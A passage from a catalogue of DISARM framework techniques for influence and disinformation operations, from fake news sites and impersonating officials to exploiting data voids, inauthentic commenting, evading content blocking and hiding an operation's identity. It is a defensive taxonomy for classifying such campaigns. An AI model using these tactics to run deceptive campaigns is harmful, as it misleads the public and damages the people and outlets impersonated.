https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0098.md

Create Inauthentic News Sites

Create Inauthentic News Sites

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic News Sites"

Table 1398. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0098.001.md

Leverage Existing Inauthentic News Sites

Leverage Existing Inauthentic News Sites

The tag is: misp-galaxy:disarm-techniques="Leverage Existing Inauthentic News Sites"

Table 1399. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0098.002.md

Impersonate Existing Entity

An influence operation may prepare assets impersonating existing entities (both organisations and people) to further conceal its network identity and add a layer of legitimacy to its operation content. Existing entities may include authentic news outlets, public figures, organisations, or state entities. 

Users will more likely believe and less likely fact-check news from recognisable sources rather than unknown sites. 

An influence operation may use a wide variety of cyber techniques to impersonate a legitimate entity’s website or social media account. 

This Technique was previously called Prepare Assets Impersonating Legitimate Entities.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Entity"

Table 1400. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.md

Spoof/Parody Account/Site

An influence operation may prepare assets impersonating legitimate entities to further conceal its network identity and add a layer of legitimacy to its operation content. Users will more likely believe and less likely fact-check news from recognisable sources rather than unknown sites. Legitimate entities may include authentic news outlets, public figures, organisations, or state entities.

The tag is: misp-galaxy:disarm-techniques="Spoof/Parody Account/Site"

Table 1401. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.002.md

Impersonate Existing Organisation

A situation where a threat actor styles their online assets or content to mimic an existing organisation.

This can be done to take advantage of peoples’ trust in the organisation to increase narrative believability, to smear the organisation, or to make the organisation less trustworthy.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Organisation"

Table 1402. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.003.md

Impersonate Existing Media Outlet

A situation where a threat actor styles their online assets or content to mimic an existing media outlet.

This can be done to take advantage of peoples’ trust in the outlet to increase narrative believability, to smear the outlet, or to make the outlet less trustworthy.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Media Outlet"

Table 1403. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.004.md

Impersonate Existing Official

A situation where a threat actor styles their online assets or content to impersonate an official (including government officials, organisation officials, etc).

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Official"

Table 1404. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.005.md

Impersonate Existing Influencer

A situation where a threat actor styles their online assets or content to impersonate an influencer or celebrity, typically to exploit users’ existing faith in the impersonated target.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Influencer"

Table 1405. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.006.md

Co-Opt Trusted Sources

An influence operation may co-opt trusted sources by infiltrating or repurposing a source to reach a target audience through existing, previously reliable networks. Co-opted trusted sources may include: - National or local new outlets - Research or academic publications - Online blogs or websites

The tag is: misp-galaxy:disarm-techniques="Co-Opt Trusted Sources"

Table 1406. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.md

Co-Opt Trusted Individuals

Co-Opt Trusted Individuals

The tag is: misp-galaxy:disarm-techniques="Co-Opt Trusted Individuals"

Table 1407. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.001.md

Co-Opt Grassroots Groups

Co-Opt Grassroots Groups

The tag is: misp-galaxy:disarm-techniques="Co-Opt Grassroots Groups"

Table 1408. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.002.md

Co-Opt Influencers

Co-opt Influencers

The tag is: misp-galaxy:disarm-techniques="Co-Opt Influencers"

Table 1409. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.003.md

Create Localised Content

Localised content refers to content that appeals to a specific community of individuals, often in defined geographic areas. An operation may create localised content using local language and dialects to resonate with its target audience and blend in with other local news and social media. Localised content may help an operation increase legitimacy, avoid detection, and complicate external attribution.

The tag is: misp-galaxy:disarm-techniques="Create Localised Content"

Table 1410. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0101.md

Leverage Echo Chambers/Filter Bubbles

An echo chamber refers to an internet subgroup, often along ideological lines, where individuals only engage with “others with which they are already in agreement.” A filter bubble refers to an algorithm’s placement of an individual in content that they agree with or regularly engage with, possibly entrapping the user into a bubble of their own making. An operation may create these isolated areas of the internet by match existing groups, or aggregating individuals into a single target audience based on shared interests, politics, values, demographics, and other characteristics. Echo chambers and filter bubbles help to reinforce similar biases and content to the same target audience members.

The tag is: misp-galaxy:disarm-techniques="Leverage Echo Chambers/Filter Bubbles"

Table 1411. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.md

Use Existing Echo Chambers/Filter Bubbles

Use existing Echo Chambers/Filter Bubbles

The tag is: misp-galaxy:disarm-techniques="Use Existing Echo Chambers/Filter Bubbles"

Table 1412. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.001.md

Create Echo Chambers/Filter Bubbles

Create Echo Chambers/Filter Bubbles

The tag is: misp-galaxy:disarm-techniques="Create Echo Chambers/Filter Bubbles"

Table 1413. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.002.md

Exploit Data Voids

A data void refers to a word or phrase that results in little, manipulative, or low-quality search engine data. Data voids are hard to detect and relatively harmless until exploited by an entity aiming to quickly proliferate false or misleading information during a phenomenon that causes a high number of individuals to query the term or phrase. In the Plan phase, an influence operation may identify data voids for later exploitation in the operation. A 2019 report by Michael Golebiewski identifies five types of data voids. (1) “Breaking news” data voids occur when a keyword gains popularity during a short period of time, allowing an influence operation to publish false content before legitimate news outlets have an opportunity to publish relevant information. (2) An influence operation may create a “strategic new terms” data void by creating their own terms and publishing information online before promoting their keyword to the target audience. (3) An influence operation may publish content on “outdated terms” that have decreased in popularity, capitalising on most search engines’ preferences for recency. (4) “Fragmented concepts” data voids separate connections between similar ideas, isolating segment queries to distinct search engine results. (5) An influence operation may use “problematic queries” that previously resulted in disturbing or inappropriate content to promote messaging until mainstream media recontextualizes the term.

The tag is: misp-galaxy:disarm-techniques="Exploit Data Voids"

Table 1414. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.003.md

Livestream

A livestream refers to an online broadcast capability that allows for real-time communication to closed or open networks.

The tag is: misp-galaxy:disarm-techniques="Livestream"

Table 1415. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0103.md

Video Livestream

A video livestream refers to an online video broadcast capability that allows for real-time communication to closed or open networks.

The tag is: misp-galaxy:disarm-techniques="Video Livestream"

Table 1416. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0103.001.md

Audio Livestream

An audio livestream refers to an online audio broadcast capability that allows for real-time communication to closed or open networks.

The tag is: misp-galaxy:disarm-techniques="Audio Livestream"

Table 1417. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0103.002.md

Social Networks

Social media are interactive digital channels that facilitate the creation and sharing of information, ideas, interests, and other forms of expression through virtual communities and networks.

The tag is: misp-galaxy:disarm-techniques="Social Networks"

Table 1418. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.md

Mainstream Social Networks

Examples include Facebook, Twitter, LinkedIn, etc.

The tag is: misp-galaxy:disarm-techniques="Mainstream Social Networks"

Table 1419. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.001.md

Dating App

“Dating App” refers to any platform (or platform feature) in which the ostensive purpose is for users to develop a physical/romantic relationship with other users.

Threat Actors can exploit users’ quest for love to trick them into doing things like revealing sensitive information or giving them money.

Examples include Tinder, Bumble, Grindr, Facebook Dating, Tantan, Badoo, Plenty of Fish, hinge, LOVOO, OkCupid, happn, and Mamba.

The tag is: misp-galaxy:disarm-techniques="Dating App"

Table 1420. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.002.md

Private/Closed Social Networks

Social networks that are not open to people outside of family, friends, neighbours, or co-workers. Non-work-related examples include Couple, FamilyWall, 23snaps, and Nextdoor. Some of the larger social network platforms enable closed communities: examples are Instagram Close Friends and Twitter (X) Circle. Work-related examples of private social networks include LinkedIn, Facebook Workplace, and enterprise communication platforms such as Slack or Microsoft Teams.

The tag is: misp-galaxy:disarm-techniques="Private/Closed Social Networks"

Table 1421. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.003.md

Interest-Based Networks

Examples include smaller and niche networks including Gettr, Truth Social, Parler, etc.

The tag is: misp-galaxy:disarm-techniques="Interest-Based Networks"

Table 1422. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.004.md

Use Hashtags

Use a dedicated, existing hashtag for the campaign/incident.

The tag is: misp-galaxy:disarm-techniques="Use Hashtags"

Table 1423. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.005.md

Create Dedicated Hashtag

Create a campaign/incident specific hashtag.

The tag is: misp-galaxy:disarm-techniques="Create Dedicated Hashtag"

Table 1424. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.006.md

Media Sharing Networks

Media sharing networks refer to services whose primary function is the hosting and sharing of specific forms of media. Examples include Instagram, Snapchat, TikTok, Youtube, SoundCloud.

The tag is: misp-galaxy:disarm-techniques="Media Sharing Networks"

Table 1425. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.md

Photo Sharing

Examples include Instagram, Snapchat, Flickr, etc

The tag is: misp-galaxy:disarm-techniques="Photo Sharing"

Table 1426. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.001.md

Video Sharing

Examples include Youtube, TikTok, ShareChat, Rumble, etc

The tag is: misp-galaxy:disarm-techniques="Video Sharing"

Table 1427. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.002.md

Audio Sharing

Examples include podcasting apps, Soundcloud, etc.

The tag is: misp-galaxy:disarm-techniques="Audio Sharing"

Table 1428. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.003.md

Discussion Forums

Platforms for finding, discussing, and sharing information and opinions. Examples include Reddit, Quora, Digg, message boards, interest-based discussion forums, etc.

The tag is: misp-galaxy:disarm-techniques="Discussion Forums"

Table 1429. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0106.md

Anonymous Message Boards

Examples include the Chans

The tag is: misp-galaxy:disarm-techniques="Anonymous Message Boards"

Table 1430. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0106.001.md

Bookmarking and Content Curation

Platforms for searching, sharing, and curating content and media. Examples include Pinterest, Flipboard, etc.

The tag is: misp-galaxy:disarm-techniques="Bookmarking and Content Curation"

Table 1431. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0107.md

Blogging and Publishing Networks

Examples include WordPress, Blogger, Weebly, Tumblr, Medium, etc.

The tag is: misp-galaxy:disarm-techniques="Blogging and Publishing Networks"

Table 1432. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0108.md

Consumer Review Networks

Platforms for finding, reviewing, and sharing information about brands, products, services, restaurants, travel destinations, etc. Examples include Yelp, TripAdvisor, etc.

The tag is: misp-galaxy:disarm-techniques="Consumer Review Networks"

Table 1433. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0109.md

Formal Diplomatic Channels

Leveraging formal, traditional, diplomatic channels to communicate with foreign governments (written documents, meetings, summits, diplomatic visits, etc). This type of diplomacy is conducted by diplomats of one nation with diplomats and other officials of another nation or international organisation.

The tag is: misp-galaxy:disarm-techniques="Formal Diplomatic Channels"

Table 1434. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0110.md

Traditional Media

Examples include TV, Newspaper, Radio, etc.

The tag is: misp-galaxy:disarm-techniques="Traditional Media"

Table 1435. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.md

TV

TV

The tag is: misp-galaxy:disarm-techniques="TV"

Table 1436. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.001.md

Newspaper

Newspaper

The tag is: misp-galaxy:disarm-techniques="Newspaper"

Table 1437. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.002.md

Radio

Radio

The tag is: misp-galaxy:disarm-techniques="Radio"

Table 1438. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.003.md

Email

Delivering content and narratives via email. This can include using list management or high-value individually targeted messaging.

The tag is: misp-galaxy:disarm-techniques="Email"

Table 1439. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0112.md

Employ Commercial Analytic Firms

Commercial analytic firms collect data on target audience activities and evaluate the data to detect trends, such as content receiving high click-rates. An influence operation may employ commercial analytic firms to facilitate external collection on its target audience, complicating attribution efforts and better tailoring the content to audience preferences.

The tag is: misp-galaxy:disarm-techniques="Employ Commercial Analytic Firms"

Table 1440. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0113.md

Deliver Ads

Delivering content via any form of paid media or advertising.

The tag is: misp-galaxy:disarm-techniques="Deliver Ads"

Table 1441. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0114.md

Social Media

Social Media

The tag is: misp-galaxy:disarm-techniques="Social Media"

Table 1442. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0114.001.md

Post Content

Delivering content by posting via owned media (assets that the operator controls).

The tag is: misp-galaxy:disarm-techniques="Post Content"

Table 1443. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.md

Share Memes

Memes are one of the most important single artefact types in all of computational propaganda. Memes in this framework denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:disarm-techniques="Share Memes"

Table 1444. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.001.md

Post Violative Content to Provoke Takedown and Backlash

Post Violative Content to Provoke Takedown and Backlash.

The tag is: misp-galaxy:disarm-techniques="Post Violative Content to Provoke Takedown and Backlash"

Table 1445. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.002.md

One-Way Direct Posting

Direct posting refers to a method of posting content via a one-way messaging service, where the recipient cannot directly respond to the poster’s messaging. An influence operation may post directly to promote operation narratives to the target audience without allowing opportunities for fact-checking or disagreement, creating a false sense of support for the narrative.

The tag is: misp-galaxy:disarm-techniques="One-Way Direct Posting"

Table 1446. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.003.md

Comment or Reply on Content

Delivering content by replying or commenting via owned media (assets that the operator controls).

The tag is: misp-galaxy:disarm-techniques="Comment or Reply on Content"

Table 1447. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0116.md

Post Inauthentic Social Media Comment

Use government-paid social media commenters, astroturfers, chat bots (programmed to reply to specific key words/hashtags) influence online conversations, product reviews, web-site comment forums.

The tag is: misp-galaxy:disarm-techniques="Post Inauthentic Social Media Comment"

Table 1448. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0116.001.md

Attract Traditional Media

Deliver content by attracting the attention of traditional media (earned media).

The tag is: misp-galaxy:disarm-techniques="Attract Traditional Media"

Table 1449. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0117.md

Amplify Existing Narrative

An influence operation may amplify existing narratives that align with its narratives to support operation objectives.

The tag is: misp-galaxy:disarm-techniques="Amplify Existing Narrative"

Table 1450. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0118.md

Cross-Posting

Cross-posting refers to posting the same message to multiple internet discussions, social media platforms or accounts, or news groups at one time. An influence operation may post content online in multiple communities and platforms to increase the chances of content exposure to the target audience.

The tag is: misp-galaxy:disarm-techniques="Cross-Posting"

Table 1451. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.md

Post across Groups

An influence operation may post content across groups to spread narratives and content to new communities within the target audiences or to new target audiences.

The tag is: misp-galaxy:disarm-techniques="Post across Groups"

Table 1452. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.001.md

Post across Platform

An influence operation may post content across platforms to spread narratives and content to new communities within the target audiences or to new target audiences. Posting across platforms can also remove opposition and context, helping the narrative spread with less opposition on the cross-posted platform.

The tag is: misp-galaxy:disarm-techniques="Post across Platform"

Table 1453. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.002.md

Post across Disciplines

Post Across Disciplines

The tag is: misp-galaxy:disarm-techniques="Post across Disciplines"

Table 1454. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.003.md

Incentivize Sharing

Incentivizing content sharing refers to actions that encourage users to share content themselves, reducing the need for the operation itself to post and promote its own content.

The tag is: misp-galaxy:disarm-techniques="Incentivize Sharing"

Table 1455. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0120.md

Use Affiliate Marketing Programmes

Use Affiliate Marketing Programmes

The tag is: misp-galaxy:disarm-techniques="Use Affiliate Marketing Programmes"

Table 1456. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0120.001.md

Use Contests and Prizes

Use Contests and Prizes

The tag is: misp-galaxy:disarm-techniques="Use Contests and Prizes"

Table 1457. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0120.002.md

Manipulate Platform Algorithm

Manipulating a platform algorithm refers to conducting activity on a platform in a way that intentionally targets its underlying algorithm. After analysing a platform’s algorithm (see: Select Platforms), an influence operation may use a platform in a way that increases its content exposure, avoids content removal, or otherwise benefits the operation’s strategy. For example, an influence operation may use bots to amplify its posts so that the platform’s algorithm recognises engagement with operation content and further promotes the content on user timelines.

The tag is: misp-galaxy:disarm-techniques="Manipulate Platform Algorithm"

Table 1458. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0121.md

Bypass Content Blocking

Bypassing content blocking refers to actions taken to circumvent network security measures that prevent users from accessing certain servers, resources, or other online spheres. An influence operation may bypass content blocking to proliferate its content on restricted areas of the internet. Common strategies for bypassing content blocking include: - Altering IP addresses to avoid IP filtering - Using a Virtual Private Network (VPN) to avoid IP filtering - Using a Content Delivery Network (CDN) to avoid IP filtering - Enabling encryption to bypass packet inspection blocking - Manipulating text to avoid filtering by keywords - Posting content on multiple platforms to avoid platform-specific removals - Using local facilities or modified DNS servers to avoid DNS filtering

The tag is: misp-galaxy:disarm-techniques="Bypass Content Blocking"

Table 1459. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0121.001.md

Direct Users to Alternative Platforms

Direct users to alternative platforms refers to encouraging users to move from the platform on which they initially viewed operation content and engage with content on alternate information channels, including separate social media channels and inauthentic websites. An operation may drive users to alternative platforms to diversify its information channels and ensure the target audience knows where to access operation content if the initial platform suspends, flags, or otherwise removes original operation assets and content.

The tag is: misp-galaxy:disarm-techniques="Direct Users to Alternative Platforms"

Table 1460. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0122.md

Control Information Environment through Offensive Cyberspace Operations

Controlling the information environment through offensive cyberspace operations uses cyber tools and techniques to alter the trajectory of content in the information space to either prioritise operation messaging or block opposition messaging.

The tag is: misp-galaxy:disarm-techniques="Control Information Environment through Offensive Cyberspace Operations"

Table 1461. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.md

Delete Opposing Content

Deleting opposing content refers to the removal of content that conflicts with operational narratives from selected platforms. An influence operation may delete opposing content to censor contradictory information from the target audience, allowing operation narratives to take priority in the information space.

The tag is: misp-galaxy:disarm-techniques="Delete Opposing Content"

Table 1462. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.001.md

Block Content

Content blocking refers to actions taken to restrict internet access or render certain areas of the internet inaccessible. An influence operation may restrict content based on both network and content attributes.

The tag is: misp-galaxy:disarm-techniques="Block Content"

Table 1463. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.002.md

Destroy Information Generation Capabilities

Destroying information generation capabilities refers to actions taken to limit, degrade, or otherwise incapacitate an actor’s ability to generate conflicting information. An influence operation may destroy an actor’s information generation capabilities by physically dismantling the information infrastructure, disconnecting resources needed for information generation, or redirecting information generation personnel. An operation may destroy an adversary’s information generation capabilities to limit conflicting content exposure to the target audience and crowd the information space with its own narratives.

The tag is: misp-galaxy:disarm-techniques="Destroy Information Generation Capabilities"

Table 1464. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.003.md

Conduct Server Redirect

A server redirect, also known as a URL redirect, occurs when a server automatically forwards a user from one URL to another using server-side or client-side scripting languages. An influence operation may conduct a server redirect to divert target audience members from one website to another without their knowledge. The redirected website may pose as a legitimate source, host malware, or otherwise aid operation objectives.

The tag is: misp-galaxy:disarm-techniques="Conduct Server Redirect"

Table 1465. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.004.md

Suppress Opposition

Operators can suppress the opposition by exploiting platform content moderation tools and processes like reporting non-violative content to platforms for takedown and goading opposition actors into taking actions that result in platform action or target audience disapproval.

The tag is: misp-galaxy:disarm-techniques="Suppress Opposition"

Table 1466. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.md

Report Non-Violative Opposing Content

Reporting opposing content refers to notifying and providing an instance of a violation of a platform’s guidelines and policies for conduct on the platform. In addition to simply reporting the content, an operation may leverage copyright regulations to trick social media and web platforms into removing opposing content by manipulating the content to appear in violation of copyright laws. Reporting opposing content facilitates the suppression of contradictory information and allows operation narratives to take priority in the information space.

The tag is: misp-galaxy:disarm-techniques="Report Non-Violative Opposing Content"

Table 1467. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.001.md

Goad People into Harmful Action (Stop Hitting Yourself)

Goad people into actions that violate terms of service or will lead to having their content or accounts taken down.

The tag is: misp-galaxy:disarm-techniques="Goad People into Harmful Action (Stop Hitting Yourself)"

Table 1468. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.002.md

Exploit Platform TOS/Content Moderation

Exploit Platform TOS/Content Moderation

The tag is: misp-galaxy:disarm-techniques="Exploit Platform TOS/Content Moderation"

Table 1469. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.003.md

Platform Filtering

Platform filtering refers to the decontextualization of information as claims cross platforms (from Joan Donovan https://www.hks.harvard.edu/publications/disinformation-design-use-evidence-collages-and-platform-filtering-media-manipulation)

The tag is: misp-galaxy:disarm-techniques="Platform Filtering"

Table 1470. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0125.md

Encourage Attendance at Events

Operation encourages attendance at existing real world event.

The tag is: misp-galaxy:disarm-techniques="Encourage Attendance at Events"

Table 1471. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0126.md

Call to Action to Attend

Call to action to attend an event

The tag is: misp-galaxy:disarm-techniques="Call to Action to Attend"

Table 1472. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0126.001.md

Facilitate Logistics or Support for Attendance

Facilitate logistics or support for travel, food, housing, etc.

The tag is: misp-galaxy:disarm-techniques="Facilitate Logistics or Support for Attendance"

Table 1473. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0126.002.md

Physical Violence

Physical violence refers to the use of force to injure, abuse, damage, or destroy. An influence operation may conduct or encourage physical violence to discourage opponents from promoting conflicting content or draw attention to operation narratives using shock value.

The tag is: misp-galaxy:disarm-techniques="Physical Violence"

Table 1474. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0127.md

Conduct Physical Violence

An influence operation may directly Conduct Physical Violence to achieve campaign goals.

The tag is: misp-galaxy:disarm-techniques="Conduct Physical Violence"

Table 1475. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0127.001.md

Encourage Physical Violence

An influence operation may Encourage others to engage in Physical Violence to achieve campaign goals.

The tag is: misp-galaxy:disarm-techniques="Encourage Physical Violence"

Table 1476. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0127.002.md

Conceal Information Assets

Conceal the identity or provenance of campaign information assets such as accounts, channels, pages etc. to avoid takedown and attribution.

The tag is: misp-galaxy:disarm-techniques="Conceal Information Assets"

Table 1477. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.md

Use Pseudonyms

An operation may use pseudonyms, or fake names, to mask the identity of operational accounts, channels, pages etc., publish anonymous content, or otherwise use falsified personas to conceal the identity of the operation. An operation may coordinate pseudonyms across multiple platforms, for example, by writing an article under a pseudonym and then posting a link to the article on social media on an account, channel, or page with the same falsified name.

The tag is: misp-galaxy:disarm-techniques="Use Pseudonyms"

Table 1478. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.001.md

Conceal Network Identity

Concealing network identity aims to hide the existence an influence operation’s network completely. Unlike concealing sponsorship, concealing network identity denies the existence of any sort of organisation.

The tag is: misp-galaxy:disarm-techniques="Conceal Network Identity"

Table 1479. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.002.md

Distance Reputable Individuals from Operation

Distancing reputable individuals from the operation occurs when enlisted individuals, such as celebrities or subject matter experts, actively disengage themselves from operation activities and messaging. Individuals may distance themselves from the operation by deleting old posts or statements, unfollowing operation information assets, or otherwise detaching themselves from the operation’s timeline. An influence operation may want reputable individuals to distance themselves from the operation to reduce operation exposure, particularly if the operation aims to remove all evidence.

The tag is: misp-galaxy:disarm-techniques="Distance Reputable Individuals from Operation"

Table 1480. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.003.md

Launder Information Assets

Laundering occurs when an influence operation acquires control of previously legitimate information assets such as accounts, channels, pages etc. from third parties through sale or exchange and often in contravention of terms of use. Influence operations use laundered assets to reach target audience members from within an existing information community and to complicate attribution.

The tag is: misp-galaxy:disarm-techniques="Launder Information Assets"

Table 1481. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.004.md

Change Names of Information Assets

Changing names or brand names of information assets such as accounts, channels, pages etc. An operation may change the names or brand names of its assets throughout an operation to avoid detection or alter the names of newly acquired or repurposed assets to fit operational narratives.

The tag is: misp-galaxy:disarm-techniques="Change Names of Information Assets"

Table 1482. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.005.md

Conceal Operational Activity

Conceal the campaign’s operational activity to avoid takedown and attribution.

The tag is: misp-galaxy:disarm-techniques="Conceal Operational Activity"

Table 1483. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.md

Generate Content Unrelated to Narrative

An influence operation may mix its own operation content with legitimate news or external unrelated content to disguise operational objectives, narratives, or existence. For example, an operation may generate "lifestyle" or "cuisine" content alongside regular operation content.

The tag is: misp-galaxy:disarm-techniques="Generate Content Unrelated to Narrative"

Table 1484. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.002.md

Break Association with Content

Breaking association with content occurs when an influence operation actively separates itself from its own content. An influence operation may break association with content by unfollowing, unliking, or unsharing its content, removing attribution from its content, or otherwise taking actions that distance the operation from its messaging. An influence operation may break association with its content to complicate attribution or regain credibility for a new operation.

The tag is: misp-galaxy:disarm-techniques="Break Association with Content"

Table 1485. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.003.md

Delete URLs

